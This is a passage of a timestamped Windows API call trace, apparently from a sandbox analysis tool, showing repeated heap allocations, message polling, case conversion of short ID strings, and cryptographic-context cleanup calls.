returned 0x34a0180 [0164.328] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0164.328] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0164.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0164.329] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0164.329] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0164.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0164.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0164.329] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0164.329] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.329] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0164.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0164.329] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0164.329] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0164.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0164.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0164.329] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0164.329] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.329] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0164.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0164.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0164.330] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.330] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0164.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0164.330] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0164.330] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0164.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0164.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0164.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0164.330] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0164.330] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.330] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0164.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0164.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0164.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0164.330] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.331] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.331] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0164.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0164.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.339] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.339] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.339] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0164.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0164.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.342] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0164.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0164.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0164.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0164.342] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0164.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0164.342] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0164.342] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0164.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0164.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0164.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0164.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0164.342] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0164.342] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0164.342] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0164.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0164.343] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.343] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0164.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0164.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0164.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0164.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0164.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0164.343] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.343] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0164.343] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0164.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0164.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0164.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0164.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0164.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0164.343] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0164.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0164.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0164.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0164.343] CryptDestroyKey (hKey=0xaa55e0) returned 1 [0164.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0164.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0164.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0164.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0164.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0164.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0164.344] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0164.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0164.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0164.344] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0164.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0164.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0164.344] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0164.344] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0164.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0164.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0164.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0164.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0164.344] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0164.344] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0164.344] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0164.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0164.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0164.345] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0164.345] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0164.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0164.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0164.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0164.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0164.345] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0164.345] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0164.345] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0164.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0164.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0164.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0164.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0164.345] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0164.345] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0164.345] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0164.345] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0164.345] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0164.345] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0164.345] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0164.346] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0164.346] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0164.346] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0164.346] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0164.346] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.346] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0164.346] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.346] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0164.346] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.346] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.346] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0164.346] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.346] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0164.346] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.346] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.346] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.346] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.346] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0164.346] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0164.346] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0164.346] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0164.347] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0164.347] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.347] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.347] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.347] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.347] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.347] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.347] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0164.347] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.347] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0164.347] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.347] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.347] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.347] CryptReleaseContext (hProv=0xab2890, dwFlags=0x0) returned 1 [0164.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0164.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0164.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 